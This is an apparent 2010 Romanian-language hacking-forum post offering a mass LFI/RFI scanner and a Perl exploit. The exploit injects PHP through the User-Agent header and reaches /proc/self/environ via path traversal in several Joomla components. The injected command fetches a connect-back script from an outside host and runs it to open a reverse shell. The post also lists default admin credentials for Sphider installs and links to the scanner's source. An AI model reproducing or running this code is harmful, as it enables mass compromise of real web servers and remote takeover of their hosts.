Mass lfi ; rfi tool!

[UstupidMF]

Puteti sa-l tot modificatzi asa cum am facut si eu in ultimii ani.

Mura-n-Gura

if(strstr(ret,"RoundCube List Widget")!=NULL) aici punetzi voi ce sa caute .. pt rfi daca facetzi ceva gen

http://ip/rfi=http://ip/shell.php?

<?php

echo ("MFU hacked you");

?>

punetzi sa caute MFU hacked you

rfi-urile le punetzi intr-un cgifile

/ip/rfibug?bug=http://ip/pathspre/shell.php?

Pentru compilare downloadatzi toate fisierele

http://UstupidMF.xhost.ro/vuln/mass.c.txt

http://UstupidMF.xhost.ro/vuln/http_get.c.txt

http://UstupidMF.xhost.ro/vuln/http_get.h.txt

http://UstupidMF.xhost.ro/vuln/build.h.txt

Daca reusiti sa-l modificatzi intr-un mass mai bun nu ezitatzi sa-mi datzi un e-mail

h00lyshit123 at gmail dot com

/sphider/install.txt

/search/install.txt

/sphider-plus/install.txt

/sphider-1.3.5/install.txt

if(strstr(ret,"Sphider - a lightweight")!=NULL) exit(0);

nu trebuie sa va chinuiti prea mult cu el

cu sphider o sa gasiti destule,problema este ca nu foarte multe au userul si pasul default

admin = admin

dar puteti incerca cu http://ip/path/spider.php

si datzi direct click pe login

use LWP::UserAgent;

my $path = $ARGV[0] or die("Usage: perl env.pl http://mf.mf/director\n");

$ua = new LWP::UserAgent;

$ua->agent("<?system('ls -all;uname -a;id;pwd;wget host/a/cback.txt -O /var/tmp/cback.txt;perl /var/tmp/cback.txt host 80');?>");

{

print "[*] [*] [*] Tulai Domne [*] [*] [*]\n";

}

my $req = new HTTP::Request (POST => "$path/index.php");

$req->content_type('application/x-www-form-urlencoded');

$req->content("_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[itemid]=../../../../../../../../../../../../../../../proc/self/environ%00");

$req->content("option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00");

$req->content("option=com_sweetykeeper&controller=../../../../../../../../../../proc/self/environ%00");

$req->content("option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00");

$req->content("option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00");

$req->content("option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00");

$req->content("page=../../../../../../../../proc/self/environ%00");

$req->content("option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00");

$req->content("_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ");

$req->content("option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00");

my $res = $ua->request($req);

my $data = $res->as_string;

if ( $data =~ /<td class=["']main_section['"]>(.*)/ )

{

print "[*] [*] [*] Tulai Domne [*] [*] [*]\n";

}

else

{

print "$data\n";

}

Este sploitu de e107,l-am modificat putin pt lfi-uri

daca nu va place asa,puteti sa adaugatzi inca un argv sa scoateti stringul din xpl

my $path = $ARGV[0] or die("Usage: perl env.pl http://mf.mf/director\n");

my $load = $ARGV[1];

my $req = new HTTP::Request (POST => "$path/index.php?$load");

$req->content("$load=../../../../../../../../../../../../../../../proc/self/environ%00");

Edited July 12, 2010 by UstupidMF